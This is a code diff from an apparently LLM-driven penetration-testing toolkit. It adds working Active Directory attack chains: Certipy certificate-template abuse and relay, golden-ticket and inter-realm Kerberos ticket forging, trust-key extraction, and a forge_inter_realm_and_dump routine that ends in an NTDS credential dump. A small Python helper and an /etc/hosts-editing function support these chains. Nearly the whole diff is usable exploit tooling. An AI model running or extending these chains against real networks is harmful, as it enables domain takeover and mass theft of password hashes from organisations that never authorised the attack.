.timeout_secs(30) + .execute() + .await?; + outputs.push(("Combine PFX", combine)); + } + + // Step 5: Authenticate with the retrieved PFX + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + + let step5 = CommandBuilder::new("certipy") + .arg("auth") + .flag("-pfx", &pfx_path) + .flag("-dc-ip", dc_ip) + .flag("-domain", domain) + .timeout_secs(120) + .execute() + .await?; + let auth_success = step5.success; + outputs.push(("Authenticate", step5)); + + let combined_stdout = outputs + .iter() + 
.map(|(name, o)| format!("=== Step: {name} ===\n{}", o.stdout)) + .collect::<Vec<_>>() + .join("\n"); + let combined_stderr = outputs + .iter() + .map(|(name, o)| format!("=== Step: {name} ===\n{}", o.stderr)) + .collect::<Vec<_>>() + .join("\n"); + + Ok(ToolOutput { + stdout: combined_stdout, + stderr: combined_stderr, + exit_code: if auth_success { Some(0) } else { Some(1) }, + success: auth_success, + }) +} + +/// Start a Certipy relay listener for ESC8 (HTTP) or ESC11 (RPC) attacks. +/// +/// Required args: `target`, `ca` +/// Optional args: `template` +/// +/// For ESC8: `certipy relay -target http://ca-host -ca CA-NAME` +/// For ESC11: `certipy relay -target rpc://ca-host -ca CA-NAME` +pub async fn certipy_relay(args: &Value) -> Result<ToolOutput> { + let target = required_str(args, "target")?; + let ca = required_str(args, "ca")?; + let template = optional_str(args, "template"); + + CommandBuilder::new("certipy") + .arg("relay") + .flag("-target", target) + .flag("-ca", ca) + .flag_opt("-template", template) + .timeout_secs(300) + .execute() + .await +} + /// Modify a certificate template for ESC4 exploitation using Certipy. /// /// Required args: `username`, `domain`, `password`, `template`, `dc_ip` @@ -130,12 +529,34 @@ pub async fn certipy_template_esc4(args: &Value) -> Result<ToolOutput> { /// request -> authentication.
/// /// Required args: `username`, `domain`, `password`, `template`, `dc_ip`, -/// `ca`, `pfx_path` -/// Optional args: `upn` +/// `ca` +/// Optional args: `upn`, `target`, `sid` pub async fn certipy_esc4_full_chain(args: &Value) -> Result<ToolOutput> { let template_output = certipy_template_esc4(args).await?; - let request_output = certipy_request(args).await?; - let auth_output = certipy_auth(args).await?; + + // Generate a unique output name for the PFX and inject into args + let template = args + .get("template") + .and_then(|v| v.as_str()) + .unwrap_or("esc4"); + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out_name = format!("cert_{template}_{ts}"); + let pfx_path = format!("{out_name}.pfx"); + + let mut req_args = args.clone(); + if let Some(obj) = req_args.as_object_mut() { + obj.insert("out".into(), serde_json::json!(out_name)); + } + let request_output = certipy_request(&req_args).await?; + + let mut auth_args = args.clone(); + if let Some(obj) = auth_args.as_object_mut() { + obj.insert("pfx_path".into(), serde_json::json!(pfx_path)); + } + let auth_output = certipy_auth(&auth_args).await?; let combined_stdout = format!( "=== Step 1: Template Modification ===\n{}\n\ @@ -164,6 +585,8 @@ mod tests { use crate::args::{optional_bool, optional_str, required_str}; use serde_json::json; + // --- certipy_find --- + #[test] fn certipy_find_missing_username() { let args = json!({ @@ -243,6 +666,8 @@ mod tests { assert!(vulnerable); } + // --- certipy_request --- + #[test] fn certipy_request_missing_ca() { let args = json!({ @@ -313,6 +738,8 @@ mod tests { assert!(optional_str(&args, "upn").is_none()); } + // --- certipy_auth --- + #[test] fn certipy_auth_missing_pfx_path() { let args = json!({ @@ -352,6 +779,8 @@ mod tests { assert_eq!(required_str(&args, "domain").unwrap(), "contoso.local"); } + // --- certipy_shadow --- + #[test] fn certipy_shadow_missing_target() { let args = json!({ @@
-378,6 +807,8 @@ mod tests { assert_eq!(user_at_domain, "admin@contoso.local"); } + // --- certipy_template_esc4 --- + #[test] fn certipy_template_esc4_missing_template() { let args = json!({ @@ -404,6 +835,8 @@ mod tests { assert_eq!(user_at_domain, "admin@contoso.local"); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] @@ -478,6 +911,27 @@ mod tests { assert!(super::certipy_template_esc4(&args).await.is_ok()); } + #[tokio::test] + async fn certipy_relay_executes() { + mock::push(mock::success()); + let args = json!({ + "target": "rpc://192.168.58.10", "ca": "contoso-CA" + }); + assert!(super::certipy_relay(&args).await.is_ok()); + } + + #[tokio::test] + async fn certipy_request_with_application_policies_executes() { + mock::push(mock::success()); + let args = json!({ + "username": "admin", "domain": "contoso.local", + "password": "P@ss", "ca": "contoso-CA", "template": "ESC15", + "dc_ip": "192.168.58.1", + "application_policies": "1.3.6.1.5.5.7.3.2" + }); + assert!(super::certipy_request(&args).await.is_ok()); + } + #[tokio::test] async fn certipy_esc4_full_chain_executes() { // 3 execute calls: template, request, auth diff --git a/ares-tools/src/privesc/cross_realm_tgs.py b/ares-tools/src/privesc/cross_realm_tgs.py new file mode 100644 index 00000000..5cbcd05e --- /dev/null +++ b/ares-tools/src/privesc/cross_realm_tgs.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python3 +"""Request a TGS using a cross-realm (inter-realm) TGT. + +Workaround for impacket #315: getST/SMB cross-realm referral is broken because +``CCache.parseFile`` and ``getST.run`` only look up ``krbtgt/<realm>@<realm>`` +(a regular intra-realm TGT) when ``-k -no-pass`` is given. A forged inter-realm +TGT has server ``krbtgt/<target realm>@<source realm>``, so it is silently ignored and +getST falls through to a no-pass authentication that fails with +``KDC_ERR_WRONG_REALM`` (and exit 0, hiding the failure).
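The principal-shape mismatch the docstring describes is the whole bug: an intra-realm TGT and a forged inter-realm TGT differ only in the realm on each side of the `@`. A standalone sketch of the two server-principal forms (realm names are illustrative lab names, not from this diff):

```rust
/// Intra-realm TGT server principal: krbtgt/<REALM>@<REALM> — the only shape
/// impacket's ccache lookup matches under `-k -no-pass`.
fn intra_realm_principal(realm: &str) -> String {
    let r = realm.to_uppercase();
    format!("krbtgt/{r}@{r}")
}

/// Cross-realm TGT server principal: issued by the source realm for the
/// target realm's krbtgt service, so the realms differ.
fn cross_realm_principal(source_realm: &str, target_realm: &str) -> String {
    format!(
        "krbtgt/{}@{}",
        target_realm.to_uppercase(),
        source_realm.to_uppercase()
    )
}

fn main() {
    let intra = intra_realm_principal("essos.local");
    let cross = cross_realm_principal("north.sevenkingdoms.local", "essos.local");
    assert_eq!(intra, "krbtgt/ESSOS.LOCAL@ESSOS.LOCAL");
    assert_eq!(cross, "krbtgt/ESSOS.LOCAL@NORTH.SEVENKINGDOMS.LOCAL");
    // A lookup keyed on the intra-realm shape never matches the cross-realm
    // entry — exactly the silent miss the helper works around.
    assert_ne!(intra, cross);
}
```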
+ +This helper loads the cross-realm TGT directly out of the input ccache, calls +``getKerberosTGS`` against the target realm's KDC, and writes the resulting TGS +to a new ccache that ``nxc`` / ``secretsdump`` consume via ``KRB5CCNAME``. +""" + +import argparse +import sys + +from impacket.krb5 import constants +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGS +from impacket.krb5.types import Principal + + +def main() -> int: + p = argparse.ArgumentParser() + p.add_argument("--in-ccache", required=True, help="ccache containing the cross-realm TGT") + p.add_argument("--out-ccache", required=True, help="ccache to write resulting TGS to") + p.add_argument("--spn", required=True, help="service SPN, e.g. cifs/dc.target.local") + p.add_argument("--source-realm", required=True, help="realm where the TGT was issued") + p.add_argument("--target-realm", required=True, help="realm of the SPN") + p.add_argument("--target-kdc", required=True, help="target realm KDC IP/host to send TGS-REQ to") + args = p.parse_args() + + src_realm = args.source_realm.upper() + tgt_realm = args.target_realm.upper() + + in_cc = CCache.loadFile(args.in_ccache) + if in_cc is None: + print(f"[!] failed to load {args.in_ccache}", file=sys.stderr) + return 2 + + cross_principal = f"krbtgt/{tgt_realm}@{src_realm}" + creds = in_cc.getCredential(cross_principal, anySPN=False) + if creds is None: + print(f"[!] no cross-realm TGT for {cross_principal} in {args.in_ccache}", file=sys.stderr) + return 3 + + tgt = creds.toTGT() + server = Principal(args.spn, type=constants.PrincipalNameType.NT_SRV_INST.value) + + print( + f"[*] requesting TGS for {args.spn} from {args.target_kdc} ({tgt_realm})", + file=sys.stderr, + ) + # getKerberosTGS returns (tgs_rep, cipher, tgt_session_key, new_session_key). + # tgt_session_key decrypts the TGS-REP enc-part (key usage 8); new_session_key + # is the application key inside the TGS. fromTGS expects (tgs, oldKey, newKey). 
+ tgs, _cipher, tgt_session_key, new_session_key = getKerberosTGS( + server, + tgt_realm, + args.target_kdc, + tgt["KDC_REP"], + tgt["cipher"], + tgt["sessionKey"], + ) + + out = CCache() + out.fromTGS(tgs, tgt_session_key, new_session_key) + out.saveFile(args.out_ccache) + print(f"[+] wrote TGS to {args.out_ccache}", file=sys.stderr) + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/ares-tools/src/privesc/cve_exploits.rs b/ares-tools/src/privesc/cve_exploits.rs index 050d125d..351c0f86 100644 --- a/ares-tools/src/privesc/cve_exploits.rs +++ b/ares-tools/src/privesc/cve_exploits.rs @@ -74,6 +74,8 @@ mod tests { use crate::args::{optional_bool, optional_str, required_str}; use serde_json::json; + // --- nopac --- + #[test] fn nopac_missing_domain() { let args = json!({ @@ -177,6 +179,8 @@ mod tests { assert!(shell); } + // --- printnightmare --- + #[test] fn printnightmare_missing_target() { let args = json!({ @@ -216,6 +220,8 @@ mod tests { assert_eq!(creds, "contoso.local/admin:P@ssw0rd!@dc01.contoso.local"); } + // --- petitpotam_unauth --- + #[test] fn petitpotam_unauth_missing_listener() { let args = json!({ @@ -242,6 +248,8 @@ mod tests { assert_eq!(required_str(&args, "target").unwrap(), "dc01.contoso.local"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/delegation.rs b/ares-tools/src/privesc/delegation.rs index b2ac80f9..2bcce482 100644 --- a/ares-tools/src/privesc/delegation.rs +++ b/ares-tools/src/privesc/delegation.rs @@ -81,9 +81,12 @@ pub async fn generate_golden_ticket(args: &Value) -> Result<ToolOutput> { let domain = required_str(args, "domain")?; let extra_sid = optional_str(args, "extra_sid"); let username = optional_str(args, "username").unwrap_or("Administrator"); + // -nthash expects a 32-char NT hash; strip any LM half if the LLM + // passed a `LM:NT` concatenated form.
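`credentials::nt_hash_only` itself is not shown in this diff; a plausible minimal version of the `LM:NT` stripping it performs (a hypothetical reimplementation for illustration, not the in-tree helper):

```rust
/// Given either a bare NT hash or the `LM:NT` pair that secretsdump prints,
/// return just the NT half that impacket's `-nthash` flag expects.
fn nt_hash_only(hash: &str) -> &str {
    match hash.split_once(':') {
        Some((_lm, nt)) => nt, // drop the LM half of an `LM:NT` pair
        None => hash,          // already a bare NT hash
    }
}

fn main() {
    // secretsdump-style `LM:NT` pair → NT half only.
    assert_eq!(
        nt_hash_only("aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"),
        "31d6cfe0d16ae931b73c59d7e0c089c0"
    );
    // Bare NT hash passes through untouched.
    assert_eq!(
        nt_hash_only("31d6cfe0d16ae931b73c59d7e0c089c0"),
        "31d6cfe0d16ae931b73c59d7e0c089c0"
    );
}
```

Without this normalization, ticketer rejects the 65-character concatenated form with `'Odd-length string'`, which is the failure mode the diff comment calls out.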
+ let nt = credentials::nt_hash_only(krbtgt_hash); CommandBuilder::new("impacket-ticketer") - .flag("-nthash", krbtgt_hash) + .flag("-nthash", nt) .flag("-domain-sid", domain_sid) .flag("-domain", domain) .flag_opt("-extra-sid", extra_sid) @@ -196,13 +199,18 @@ pub async fn krbrelayup(args: &Value) -> Result<ToolOutput> { /// /// Required args: `child_domain`, `username` /// Auth: `password` (plaintext) OR `hash` (NTLM pass-the-hash). At least one required. -/// Optional args: `target_domain` +/// +/// raiseChild auto-discovers the parent forest root via the child DC's +/// trustedDomain LDAP objects, so callers don't need to supply parent FQDN +/// or DC IPs. The script accepts only the positional `domain/user[:pass]` +/// plus `-hashes`, `-w`, `-target-exec`, `-targetRID`, `-k`, `-aesKey`, +/// `-no-pass`. Passing `-dc-ip` / `-target-ip` / `-target-domain` makes +/// argparse exit 2. pub async fn raise_child(args: &Value) -> Result<ToolOutput> { let child_domain = required_str(args, "child_domain")?; let username = required_str(args, "username")?; let password = optional_str(args, "password"); let hash = optional_str(args, "hash"); - let target_domain = optional_str(args, "target_domain"); if password.is_none() && hash.is_none() { anyhow::bail!("raise_child requires either 'password' or 'hash' for authentication"); @@ -218,8 +226,6 @@ pub async fn raise_child(args: &Value) -> Result<ToolOutput> { cmd = cmd.arg(format!("{child_domain}/{username}:{p}")); } - cmd = cmd.flag_opt("-target-domain", target_domain); - // raiseChild performs multiple secretsdumps internally — needs extra time cmd.timeout_secs(300).execute().await } @@ -686,6 +692,8 @@ mod tests { assert_eq!(val, "/tmp/admin.ccache"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/gmsa.rs b/ares-tools/src/privesc/gmsa.rs index f7edfd3c..9250965c 100644 --- a/ares-tools/src/privesc/gmsa.rs +++ b/ares-tools/src/privesc/gmsa.rs @@ -74,6 +74,8 @@ mod tests { use
crate::args::{optional_str, required_str}; use serde_json::json; + // --- gmsa_dump_passwords --- + #[test] fn gmsa_dump_passwords_requires_dc_ip() { let args = json!({ @@ -121,6 +123,8 @@ mod tests { assert_eq!(optional_str(&args, "domain"), Some("contoso.local")); } + // --- unconstrained_tgt_dump --- + #[test] fn unconstrained_tgt_dump_missing_domain() { let args = json!({ @@ -178,6 +182,8 @@ mod tests { ); } + // --- unconstrained_coerce_and_capture --- + #[test] fn unconstrained_coerce_missing_coerce_from() { let args = json!({ @@ -217,6 +223,8 @@ mod tests { assert_eq!(creds, "contoso.local/admin:P@ssw0rd!@dc01.contoso.local"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/trust.rs b/ares-tools/src/privesc/trust.rs index a02dfce1..1f8d5ff9 100644 --- a/ares-tools/src/privesc/trust.rs +++ b/ares-tools/src/privesc/trust.rs @@ -1,6 +1,6 @@ //! Trust / cross-forest tool executors. -use anyhow::Result; +use anyhow::{Context, Result}; use serde_json::Value; use crate::args::{optional_str, required_str}; @@ -8,18 +8,68 @@ use crate::credentials; use crate::executor::CommandBuilder; use crate::ToolOutput; +/// Embedded Python helper that does a cross-realm TGS-REQ using a forged +/// inter-realm TGT. See `forge_inter_realm_and_dump` for why this exists. +const CROSS_REALM_TGS_HELPER: &str = include_str!("cross_realm_tgs.py"); + +/// Idempotently ensure `/etc/hosts` contains an `<ip> <hostname>` mapping so +/// callers using FQDNs (Kerberos SPN match) can resolve them on a worker that +/// has no DNS path to the lab forest. Reads the current file, returns Ok if +/// any line already maps the hostname to the given IP, otherwise appends a +/// new entry. The append is racy across concurrent runs but a duplicate line +/// is harmless and `getaddrinfo` returns the first match, so we don't lock.
+/// +/// Errors are surfaced — failing to write `/etc/hosts` would leave the caller +/// to silently fail at `nxc` time, which is exactly the symptom we're fixing. +fn ensure_hosts_entry(ip: &str, hostname: &str) -> Result<()> { + use std::io::Write as _; + let path = "/etc/hosts"; + let current = std::fs::read_to_string(path) + .with_context(|| format!("failed to read {path} for hostname mapping"))?; + let needle = format!(" {hostname} "); + let needle_eol = format!(" {hostname}\n"); + for line in current.lines() { + if line.trim_start().starts_with('#') { + continue; + } + let padded = format!(" {line} \n"); + if padded.contains(&needle) || padded.contains(&needle_eol) { + let mut fields = line.split_whitespace(); + if fields.next() == Some(ip) && fields.any(|f| f.eq_ignore_ascii_case(hostname)) { + return Ok(()); + } + } + } + let mut f = std::fs::OpenOptions::new() + .append(true) + .open(path) + .with_context(|| format!("failed to open {path} for hostname mapping"))?; + writeln!(f, "{ip} {hostname}").with_context(|| format!("failed to append to {path}"))?; + Ok(()) +} + /// Extract trust keys by dumping secrets for a trusted domain's machine account. /// -/// Required args: `domain`, `username`, `password`, `dc_ip`, `trusted_domain` +/// Required args: `domain`, `username`, `dc_ip`, `trusted_domain` +/// Auth: `password` (plaintext) OR `hash` (NTLM pass-the-hash). At least one +/// non-empty value required — empty `password` would trigger an interactive +/// `getpass()` prompt inside impacket-secretsdump and EOF the agent's stdin. 
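The duplicate-detection half of `ensure_hosts_entry` can be sketched as a side-effect-free predicate, which makes the matching rule easy to exercise without touching `/etc/hosts` (illustrative simplification — the in-tree version also appends on miss):

```rust
/// Returns true if any non-comment line of `hosts` already maps `ip` to
/// `hostname`: first whitespace field must equal the IP exactly, and some
/// later field must equal the hostname case-insensitively (as getaddrinfo
/// treats hostnames).
fn hosts_has_entry(hosts: &str, ip: &str, hostname: &str) -> bool {
    hosts.lines().any(|line| {
        let line = line.trim();
        if line.starts_with('#') {
            return false; // skip comment lines
        }
        let mut fields = line.split_whitespace();
        fields.next() == Some(ip) && fields.any(|f| f.eq_ignore_ascii_case(hostname))
    })
}

fn main() {
    let hosts = "127.0.0.1 localhost\n10.0.0.5 dc01.essos.local dc01\n# 10.0.0.9 old\n";
    assert!(hosts_has_entry(hosts, "10.0.0.5", "DC01.ESSOS.LOCAL"));
    assert!(!hosts_has_entry(hosts, "10.0.0.6", "dc01.essos.local"));
    assert!(!hosts_has_entry(hosts, "10.0.0.9", "old"));
}
```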
pub async fn extract_trust_key(args: &Value) -> Result<ToolOutput> { let domain = required_str(args, "domain")?; let username = required_str(args, "username")?; - let password = required_str(args, "password")?; + let password = optional_str(args, "password").filter(|s| !s.is_empty()); + let hash = optional_str(args, "hash").filter(|s| !s.is_empty()); let dc_ip = required_str(args, "dc_ip")?; let trusted_domain = required_str(args, "trusted_domain")?; + if password.is_none() && hash.is_none() { + anyhow::bail!( + "extract_trust_key requires non-empty 'password' or 'hash' for authentication" + ); + } + let (target_str, extra_args) = - credentials::impacket_auth(Some(domain), username, Some(password), None, dc_ip); + credentials::impacket_auth(Some(domain), username, password, hash, dc_ip); let just_dc_user = format!("{trusted_domain}$"); @@ -36,30 +86,232 @@ pub async fn extract_trust_key(args: &Value) -> Result<ToolOutput> { /// /// Required args: `trust_key`, `source_sid`, `source_domain`, `target_sid`, /// `target_domain` -/// Optional args: `username` +/// Optional args: `username`, `extra_sid`, `aes_key` +/// +/// For child-to-parent escalation (same forest), pass `extra_sid` with the +/// parent domain Enterprise Admins SID (e.g. `S-1-5-21-…-519`). +/// For cross-forest trusts, omit `extra_sid` — SID filtering blocks RIDs < 1000. +/// +/// When `aes_key` is supplied, the AES256 trust key is used in addition to the +/// NT hash. Win2016+ DCs reject RC4-only inter-realm tickets with +/// `KDC_ERR_TGT_REVOKED`, so the AES path is required for any modern target +/// forest. impacket-ticketer accepts both flags simultaneously and embeds both +/// keys in the ticket so RC4-only and AES-only KDCs both validate.
 pub async fn create_inter_realm_ticket(args: &Value) -> Result<ToolOutput> {
     let trust_key = required_str(args, "trust_key")?;
     let source_sid = required_str(args, "source_sid")?;
     let source_domain = required_str(args, "source_domain")?;
-    let target_sid = required_str(args, "target_sid")?;
+    let _target_sid = required_str(args, "target_sid")?;
     let target_domain = required_str(args, "target_domain")?;
     let username = optional_str(args, "username").unwrap_or("Administrator");
+    let extra_sid = optional_str(args, "extra_sid");
+    let aes_key = optional_str(args, "aes_key").filter(|s| !s.is_empty());
 
-    let extra_sid = format!("{target_sid}-519");
     let spn = format!("krbtgt/{target_domain}");
 
+    // -nthash expects a 32-char hex NT hash. LLMs frequently pass the
+    // concatenated `LM:NT` form harvested from secretsdump output, which
+    // ticketer rejects with `'Odd-length string'`. Strip to the NT half.
+    let nt = credentials::nt_hash_only(trust_key);
 
-    CommandBuilder::new("impacket-ticketer")
-        .flag("-nthash", trust_key)
+    let mut cmd = CommandBuilder::new("impacket-ticketer")
+        .flag("-nthash", nt)
         .flag("-domain-sid", source_sid)
-        .flag("-domain", source_domain)
-        .flag("-extra-sid", extra_sid)
-        .flag("-spn", spn)
+        .flag("-domain", source_domain);
+
+    if let Some(aes) = aes_key {
+        cmd = cmd.flag("-aesKey", aes);
+    }
+
+    if let Some(es) = extra_sid {
+        cmd = cmd.flag("-extra-sid", es);
+    }
+
+    cmd.flag("-spn", spn)
         .arg(username)
         .timeout_secs(120)
         .execute()
        .await
 }
 
+/// Forge an inter-realm Kerberos ticket, request a TGS for the target DC,
+/// then run `nxc smb --ntds` against it — all in a single worker invocation.
+///
+/// This wraps the impacket forge-and-present workaround for the cross-realm
+/// referral bug (fortra/impacket#315) into ONE deterministic tool call so
+/// the orchestrator can dispatch every parameter directly, without laundering
+/// the trust key / SIDs through an LLM.
+/// All three steps share a tempdir as
+/// cwd so the ccache files produced are colocated on disk.
+///
+/// Why three steps and not two:
+/// 1. **ticketer** forges the inter-realm TGT (`krbtgt/<target_domain>` issued
+///    by `<source_domain>`) using the trust key. Forced to **NT-only** —
+///    impacket has a salt-derivation bug on trust accounts that yields
+///    `KRB_AP_ERR_BAD_INTEGRITY` whenever the AES key is supplied alongside
+///    the NT hash. The NT-only ticket validates against modern KDCs.
+/// 2. **`cross_realm_tgs.py`** (embedded helper) loads the inter-realm TGT
+///    directly and calls `getKerberosTGS` against the target KDC for
+///    `cifs/<target>`. We can't use `impacket-getST -k -no-pass` here:
+///    impacket's `CCache.parseFile` only matches `krbtgt/<realm>@<realm>`
+///    (intra-realm TGTs) so the inter-realm credential
+///    `krbtgt/<target_realm>@<source_realm>` is silently ignored. getST then
+///    falls through to no-pass auth that returns `KDC_ERR_WRONG_REALM` with
+///    exit code 0, hiding the failure.
+/// 3. **nxc smb --ntds** dumps NTDS using the TGS via the Kerberos cache.
+///    `impacket-secretsdump` is unusable here: its DRSUAPI bind rejects
+///    cross-realm TGS auth with `Bind context rejected: invalid_checksum`.
+///    netexec's `--ntds vss` path uses a different bind sequence that
+///    accepts the cross-realm credential.
+///
+/// Required args: `trust_key`, `source_sid`, `source_domain`, `target_domain`,
+/// `target` (DC hostname, used to build the `cifs/<target>` SPN)
+/// Optional args: `target_sid` (kept for parity), `username` (default
+/// "Administrator"), `extra_sid` (child→parent only — omit for
+/// cross-forest), `dc_ip` (passed as -dc-ip and to nxc).
+pub async fn forge_inter_realm_and_dump(args: &Value) -> Result<ToolOutput> {
+    let trust_key = required_str(args, "trust_key")?;
+    let source_sid = required_str(args, "source_sid")?;
+    let source_domain = required_str(args, "source_domain")?;
+    let target_domain = required_str(args, "target_domain")?;
+    let target = required_str(args, "target")?;
+    // target_sid currently unused by ticketer but accepted for API parity
+    // with create_inter_realm_ticket; ticketer derives the realm from -domain.
+    let _target_sid = optional_str(args, "target_sid");
+    let username = optional_str(args, "username")
+        .unwrap_or("Administrator")
+        .to_string();
+    let extra_sid = optional_str(args, "extra_sid");
+    let dc_ip = optional_str(args, "dc_ip");
+
+    let nt = credentials::nt_hash_only(trust_key);
+
+    let tempdir = tempfile::tempdir().context("failed to create tempdir for inter-realm forge")?;
+    let cwd = tempdir.path().to_path_buf();
+
+    // --- Step 1: forge inter-realm TGT (NT-only) ---
+    let krbtgt_spn = format!("krbtgt/{target_domain}");
+    let mut ticketer = CommandBuilder::new("impacket-ticketer")
+        .flag("-nthash", nt)
+        .flag("-domain-sid", source_sid)
+        .flag("-domain", source_domain);
+    if let Some(es) = extra_sid {
+        ticketer = ticketer.flag("-extra-sid", es);
+    }
+    let ticketer_output = ticketer
+        .flag("-spn", krbtgt_spn)
+        .arg(&username)
+        .current_dir(&cwd)
+        .timeout_secs(120)
+        .execute()
+        .await?;
+
+    if !ticketer_output.success {
+        return Ok(ticketer_output);
+    }
+
+    let tgt_ccache = cwd.join(format!("{username}.ccache"));
+    if !tgt_ccache.exists() {
+        anyhow::bail!(
+            "impacket-ticketer reported success but {} was not produced",
+            tgt_ccache.display()
+        );
+    }
+
+    // --- Step 2: cross-realm TGS via embedded helper ---
+    //
+    // Write the helper to the tempdir and invoke it. The helper opens the
+    // forged inter-realm TGT, calls `getKerberosTGS` directly against the
+    // target KDC, and writes the resulting TGS to a new ccache.
+    // See the
+    // function docstring above for why we can't use `impacket-getST` here.
+    let helper_path = cwd.join("cross_realm_tgs.py");
+    std::fs::write(&helper_path, CROSS_REALM_TGS_HELPER)
+        .context("failed to write cross_realm_tgs helper")?;
+
+    let cifs_spn = format!("cifs/{target}");
+    let tgs_ccache = cwd.join("cross_realm_tgs.ccache");
+    let target_kdc = dc_ip.unwrap_or(target);
+
+    let getst_output = CommandBuilder::new("python3")
+        .arg(helper_path.to_string_lossy().into_owned())
+        .flag("--in-ccache", tgt_ccache.to_string_lossy().into_owned())
+        .flag("--out-ccache", tgs_ccache.to_string_lossy().into_owned())
+        .flag("--spn", &cifs_spn)
+        .flag("--source-realm", source_domain.to_uppercase())
+        .flag("--target-realm", target_domain.to_uppercase())
+        .flag("--target-kdc", target_kdc)
+        .current_dir(&cwd)
+        .timeout_secs(120)
+        .execute()
+        .await?;
+
+    if !getst_output.success {
+        return Ok(ToolOutput {
+            stdout: format!(
+                "=== impacket-ticketer ===\n{}\n=== cross_realm_tgs ===\n{}",
+                ticketer_output.stdout, getst_output.stdout
+            ),
+            stderr: format!(
+                "--- ticketer stderr ---\n{}\n--- cross_realm_tgs stderr ---\n{}",
+                ticketer_output.stderr, getst_output.stderr
+            ),
+            exit_code: getst_output.exit_code,
+            success: false,
+        });
+    }
+
+    if !tgs_ccache.exists() {
+        anyhow::bail!(
+            "cross_realm_tgs helper reported success but {} was not produced",
+            tgs_ccache.display()
+        );
+    }
+
+    // --- Step 3: nxc smb --ntds via the TGS ccache ---
+    //
+    // The cached TGS is bound to `cifs/{target}` where `target` is the FQDN
+    // baked into the ticket by step 2. nxc auto-builds its SPN from the
+    // command-line target, so we MUST pass the FQDN here — passing the IP
+    // would make nxc look up `cifs/<ip>` in the cache, miss, and silently
+    // fall through with exit 0 / empty stdout.
+    //
+    // FQDN connect requires DNS, but on a stock Kali worker `/etc/resolv.conf`
+    // points at AWS internal DNS which does not know the lab forest.
+    // Without
+    // a hosts entry the socket-layer lookup fails before nxc can speak SMB,
+    // and the same silent exit-0 failure mode shows up — masking real auth
+    // outcomes from the orchestrator's krbtgt-observation check. Append an
+    // `<ip> <hostname>` line to `/etc/hosts` (the worker runs as root) so
+    // getaddrinfo resolves cleanly. The append is idempotent — duplicate lines
+    // are harmless and survive concurrent runs without locking.
+    if let Some(ip) = dc_ip {
+        ensure_hosts_entry(ip, target)?;
+    }
+    let dump_output = CommandBuilder::new("nxc")
+        .arg("smb")
+        .arg(target)
+        .arg("-k")
+        .arg("--use-kcache")
+        .arg("--ntds")
+        .arg("vss")
+        .env("KRB5CCNAME", tgs_ccache.to_string_lossy().into_owned())
+        .current_dir(&cwd)
+        .timeout_secs(600)
+        .execute()
+        .await?;
+
+    let stdout = format!(
+        "=== impacket-ticketer ===\n{}\n=== cross_realm_tgs ===\n{}\n=== nxc smb --ntds ===\n{}",
+        ticketer_output.stdout, getst_output.stdout, dump_output.stdout
+    );
+    let stderr = format!(
+        "--- ticketer stderr ---\n{}\n--- cross_realm_tgs stderr ---\n{}\n--- nxc stderr ---\n{}",
+        ticketer_output.stderr, getst_output.stderr, dump_output.stderr
+    );
+    Ok(ToolOutput {
+        stdout,
+        stderr,
+        exit_code: dump_output.exit_code,
+        success: dump_output.success,
+    })
+}
+
 /// Look up domain SIDs using impacket-lookupsid.
/// /// Required args: `domain`, `username`, `dc_ip` @@ -126,6 +378,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- extract_trust_key --- + #[test] fn extract_trust_key_missing_trusted_domain() { let args = json!({ @@ -162,6 +416,8 @@ mod tests { assert_eq!(just_dc_user, "child.contoso.local$"); } + // --- create_inter_realm_ticket --- + #[test] fn create_inter_realm_ticket_missing_trust_key() { let args = json!({ @@ -185,7 +441,8 @@ mod tests { } #[test] - fn create_inter_realm_ticket_extra_sid_format() { + fn create_inter_realm_ticket_extra_sid_optional() { + // Without extra_sid — cross-forest case let args = json!({ "trust_key": "aabbccdd", "source_sid": "S-1-5-21-111", @@ -193,9 +450,21 @@ mod tests { "target_sid": "S-1-5-21-222", "target_domain": "contoso.local" }); - let target_sid = required_str(&args, "target_sid").unwrap(); - let extra_sid = format!("{target_sid}-519"); - assert_eq!(extra_sid, "S-1-5-21-222-519"); + assert!(optional_str(&args, "extra_sid").is_none()); + } + + #[test] + fn create_inter_realm_ticket_extra_sid_child_to_parent() { + // With extra_sid — child-to-parent case + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_sid": "S-1-5-21-222", + "target_domain": "contoso.local", + "extra_sid": "S-1-5-21-222-519" + }); + assert_eq!(optional_str(&args, "extra_sid"), Some("S-1-5-21-222-519")); } #[test] @@ -239,6 +508,8 @@ mod tests { assert_eq!(username, "fakeuser"); } + // --- get_sid --- + #[test] fn get_sid_missing_domain() { let args = json!({ @@ -323,6 +594,8 @@ mod tests { assert_eq!(hash, Some("31d6cfe0d16ae931b73c59d7e0c089c0")); } + // --- dnstool --- + #[test] fn dnstool_missing_record_name() { let args = json!({ @@ -392,6 +665,8 @@ mod tests { assert_eq!(user_spec, "contoso.local\\admin"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; @@ -409,7 +684,7 @@ mod tests { } 
